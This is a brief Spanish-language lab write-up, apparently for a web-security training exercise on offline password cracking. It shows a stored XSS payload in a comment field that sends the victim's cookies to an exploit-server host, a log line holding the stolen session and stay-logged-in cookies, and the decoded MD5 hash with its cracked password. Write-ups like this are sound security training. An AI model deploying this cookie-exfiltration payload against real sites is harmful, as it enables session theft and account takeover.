← Writeups

10 Offline password cracking

Aqui igualmente obtenemos una cookie conformada por usuario:md5(password) en este caso explotamos XSS almacenado sobre la seccion de comentarios para robar la cookie del usuario carlos con el fin de luego crackear el valor en md5

</textarea><script>document.location="https://exploit-0a5a00bf04bcabbec18d021e016f00be.exploit-server.net/exploit?" + document.cookie</script>

Exfiltramos la cookie con ayuda del exploit server y revisamos los logs

10.0.4.117      2026-02-15 00:10:29 +0000 "GET /exploit?secret=lhoqWftb49sk3Fk06x6l2KYAZBnysPWb;%20stay-logged-in=Y2FybG9zOjI2MzIzYzE2ZDVmNGRhYmZmM2JiMTM2ZjI0NjBhOTQz HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"

Al decodificar en base64

carlos:26323c16d5f4dabff3bb136f2460a943 

A partir de aqui podemos utilizar hashcat, crackstation o jhon password: onceuponatime